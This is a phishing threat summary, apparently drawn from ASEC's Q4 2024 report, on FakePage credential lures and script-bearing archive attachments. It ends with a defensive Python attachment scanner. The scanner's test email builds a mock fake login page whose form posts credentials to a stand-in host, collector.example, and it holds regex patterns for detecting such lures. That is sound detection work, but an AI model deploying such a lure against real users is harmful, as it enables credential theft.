Full Report
Overview AhnLab SEcurity intelligence Center (ASEC) monitors phishing email threats with the automatic sample analysis system (RAPIT) and honeypot. This post will cover the cases of distribution of phishing emails during the fourth quarter of 2024 (October, November, and December) and provide statistical information on each type. Generally, phishing is cited as an attack that […]
Analysis Summary
# Incident Report: Q4 2024 Phishing Campaigns via Email Attachments
## Executive Summary
During the fourth quarter of 2024 (October-December), threat actors heavily utilized phishing emails containing attachments to distribute credential-harvesting lures, primarily through **FakePage** templates (74% of threats). The primary attack vector involved deceptive web page scripts (HTML/SHTML) designed to mimic legitimate login screens to steal user credentials. While the detailed timeline of specific compromises is not provided, the pervasive nature of these attacks indicates widespread attempted credential theft across various organizations. Response efforts focused on monitoring and analysis by ASEC, leading to the classification and reporting of new attack types.
## Incident Details
- **Discovery Date:** Throughout Q4 2024 (Monitored automatically by ASEC's RAPIT system)
- **Incident Date:** Q4 2024 (October, November, December)
- **Affected Organization:** Not explicitly disclosed (General industry-wide analysis)
- **Sector:** General (Targeting users across various organizations)
- **Geography:** Not specified (Global reporting context)
## Timeline of Events
*Note: As this is a threat intelligence summary, specific infection dates are aggregated statistics rather than a singular event timeline.*
### Initial Access
- **Date/Time:** Throughout Q4 2024
- **Vector:** Phishing emails containing attachments.
- **Details:** Attachments were predominantly web page scripts (64%) or compressed files (21%) containing scripts (VBS, JS, BAT).
### Lateral Movement
- (Not detailed in the summary; assumed to follow successful credential harvesting or malware execution.)
### Data Exfiltration/Impact
- **Primary Goal:** Account credential harvesting via FakePage lures (74% of threats).
- **Secondary Goals:** Distribution of Trojans (12%), Downloaders (e.g., GuLoader, 10%), and Infostealers (2%).
### Detection & Response
- **How it was discovered:** Continuous monitoring via the AhnLab Security intelligence Center (ASEC) automatic sample analysis system (RAPIT) and honeypots.
- **Response actions taken:** Classification of attack types, statistical analysis, and public reporting to warn users about new and existing high-risk email keywords and attachment types.
## Attack Methodology
- **Initial Access:** Phishing emails with malicious attachments (Web Scripts, Compressed Files).
- **Persistence:** (If Trojans or Backdoors were successfully deployed, Persistence mechanisms would be employed, but specifics are not listed.)
- **Privilege Escalation:** (Not detailed, but implied if Trojans or Downloaders achieved full system execution.)
- **Defense Evasion:** (Implied through the use of script-based files designed to execute malicious code.)
- **Credential Access:** Primary method was **FakePage** lures (HTML/SHTML attachments) designed to trick users into entering credentials on deceptive login portals.
- **Discovery:** (Threat actors likely performed internal network reconnaissance post-compromise.)
- **Lateral Movement:** Downloaders such as GuLoader were used to fetch additional malware, which points to further system compromise and possibly lateral movement, though neither is described in the summary.
- **Collection:** Primarily focused on gathering credentials via FakePage; Infostealers collected user information.
- **Exfiltration:** Credentials harvested from FakePages were transmitted to C2 servers.
- **Impact:** Compromised user accounts leading to potential information leaks, fraud, or further malware deployment.
## Impact Assessment
- **Financial:** (No specific costs reported.)
- **Data Breach:** User login account credentials (Targeted by FakePage attacks).
- **Operational:** Potential for disruption if Trojans and Downloaders successfully established persistence or executed destructive payloads.
- **Reputational:** Risk of damage associated with successful credential theft and subsequent fraud attempts.
## Indicators of Compromise
*Note: Specific IOCs were omitted as the report focused on statistical trends rather than a specific threat actor's campaign, but the following indicators were prevalent:*
- **Network indicators:** Communication to C2 servers (associated with credential harvesting or malware delivery).
- **File indicators:** Attachments ending in HTML, SHTML, HTM (representing FakePages), RAR, CAB, 7Z, ZIP (containing VBS, VBE, JS, BAT scripts).
- **Behavioral indicators:** Execution of scripts hidden within web page/compressed attachments; redirection to fake login pages; download of secondary payloads (e.g., by GuLoader).
## Response Actions
- **Containment:** (No specific organizational containment actions detailed, as the report is retrospective and analytical.)
- **Eradication:** (No specific eradication steps detailed.)
- **Recovery:** (Focus was on informing the public/analysts to prevent further infection.)
## Lessons Learned
- **Key takeaways:** Credential harvesting via FakePage lures utilizing web page scripts (HTML/SHTML) remains the dominant phishing technique (74% occurrence). There is a notable shift towards script-based attacks, evidenced by a 12% increase in script types used for account stealing compared to Q3 2024.
- **What could have been done better:** Increased user awareness and robust email filtering solutions capable of detecting and blocking or scanning attachments containing deceptive web content or known malicious scripts are crucial.
## Recommendations
- Implement advanced email filtering to scan attachments for obfuscated scripts (JS, VBS, BAT) often hidden within archive files or presented as HTML pages.
- Enforce mandatory multi-factor authentication (MFA) to limit the impact of credentials stolen via FakePage attacks.
- Conduct targeted security awareness training focusing specifically on recognizing credential harvesting attempts embedded in realistic-looking login pages delivered via email attachments.
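As an added illustration of the attachment-filtering recommendation above and of the file indicators listed under Indicators of Compromise (example code written for this page, not ASEC's own tooling), the following Python script triages the attachments of a single email: it opens ZIP archives and reports VBS/VBE/JS/BAT members, flags RAR/CAB/7Z attachments by extension for manual review (the standard library cannot open those formats), and inspects HTML/SHTML/HTM attachments for a form with a password field, the FakePage pattern, recording where that form posts. The sample message, its attachment names and the `collector.example` URL are constructed for the demonstration.

```python
"""Attachment triage for the phishing patterns in the report (added example).

Flags: web-page attachments (html/htm/shtml) carrying a password form,
ZIP archives containing vbs/vbe/js/bat scripts, other archive types
(rar/cab/7z) for manual review, and bare script attachments.
"""
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

WEBPAGE_EXT = {"html", "htm", "shtml"}
ARCHIVE_EXT = {"zip", "rar", "cab", "7z"}
SCRIPT_EXT = {"vbs", "vbe", "js", "bat"}

# Heuristics for a credential-harvesting page: an <input type="password">
# and the URL the enclosing <form> posts to.  Chosen for this example.
PASSWORD_FIELD = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)
FORM_ACTION = re.compile(r"<form[^>]*action\s*=\s*['\"]?(https?://[^'\" >]+)", re.I)


def _ext(name):
    """Lower-cased extension of a file name, or '' if it has none."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def inspect_webpage(name, data):
    """Report an HTML attachment that asks for a password (FakePage lure)."""
    text = data.decode("utf-8", errors="replace")
    if not PASSWORD_FIELD.search(text):
        return []
    match = FORM_ACTION.search(text)
    target = match.group(1) if match else "(no external form action)"
    return [f"fakepage-candidate: {name} has a password form posting to {target}"]


def inspect_archive(name, data):
    """Open ZIP archives and list script members; other archives are flagged only."""
    if _ext(name) != "zip":
        return [f"archive-attachment: {name} ({_ext(name)}) not opened, review manually"]
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [f"script-in-archive: {name} contains {member}"
                    for member in zf.namelist() if _ext(member) in SCRIPT_EXT]
    except zipfile.BadZipFile:
        return [f"archive-attachment: {name} is not a valid zip"]


def scan_message(raw):
    """Parse a raw RFC 5322 message and return a list of finding strings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        ext = _ext(name)
        if ext in WEBPAGE_EXT:
            findings.extend(inspect_webpage(name, data))
        elif ext in ARCHIVE_EXT:
            findings.extend(inspect_archive(name, data))
        elif ext in SCRIPT_EXT:
            findings.append(f"bare-script: {name}")
    return findings


def build_sample_email():
    """Constructed test message: a FakePage .shtml plus a ZIP holding a .js file."""
    fake_page = (b"<html><body><h3>Sign in to view the document</h3>"
                 b"<form method='post' action='https://collector.example/submit'>"
                 b"<input name='user'><input type='password' name='pass'>"
                 b"</form></body></html>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "see attached")
        zf.writestr("payment.js", "// constructed placeholder, no real payload")
    msg = EmailMessage()
    msg["From"] = "billing@sender.example"
    msg["To"] = "user@victim.example"
    msg["Subject"] = "Invoice"
    msg.set_content("Please review the attached invoice.")
    msg.add_attachment(fake_page, maintype="text", subtype="html", filename="invoice.shtml")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="docs.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in scan_message(build_sample_email()):
        print(finding)
```

In a gateway the raw bytes would come from the mail transfer agent rather than `build_sample_email()`; the extension sets and the password-form heuristic are starting points to extend with the keywords and attachment types the report lists, not a complete filter.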